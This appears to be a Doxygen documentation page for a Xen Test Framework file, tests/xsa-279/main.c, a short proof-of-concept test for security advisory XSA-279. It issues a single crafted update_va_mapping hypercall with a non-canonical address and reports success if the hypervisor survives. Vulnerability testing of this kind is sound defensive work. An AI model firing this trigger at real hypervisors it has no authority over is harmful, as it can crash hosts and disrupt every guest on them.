Xen Test Framework
Toggle main menu visibility
Main Page
Related Pages
Namespaces
Namespace List
Namespace Members
All
Functions
Variables
Data Structures
Data Structures
Data Structure Index
Data Fields
All
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
q
r
s
t
u
v
w
x
Functions
Variables
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
q
r
s
t
u
v
w
x
Files
File List
Globals
All
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
q
r
s
t
u
v
w
x
z
Functions
_
a
b
c
d
e
f
g
h
i
l
m
n
o
p
q
r
s
t
u
v
w
x
Variables
_
a
b
c
d
e
f
g
h
i
l
m
n
o
p
s
t
u
v
w
x
z
Typedefs
b
c
d
e
g
i
m
p
s
u
v
x
Enumerations
Enumerator
a
k
s
u
x
Macros
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
r
s
t
u
v
w
x
z
•
All
Data Structures
Namespaces
Files
Functions
Variables
Typedefs
Enumerations
Enumerator
Macros
Pages
tests
xsa-279
main.c
Go to the documentation of this file.
1
25
#include <xtf.h>
26
27
const
char
test_title
[] =
"XSA-279 PoC"
;
28
29
void
test_main
(
void
)
30
{
31
hypercall_update_va_mapping
(1ul << 63, 0,
UVMF_INVLPG
|
UVMF_ALL
);
32
33
xtf_success
(
"Success: Not vulnerable to XSA-279\n"
);
34
}
35
36
/*
37
* Local variables:
38
* mode: C
39
* c-file-style: "BSD"
40
* c-basic-offset: 4
41
* tab-width: 4
42
* indent-tabs-mode: nil
43
* End:
44
*/
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition:
hypercall.h:115
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
UVMF_ALL
@ UVMF_ALL
Definition:
xen.h:387
UVMF_INVLPG
@ UVMF_INVLPG
Definition:
xen.h:383
Generated by
1.9.4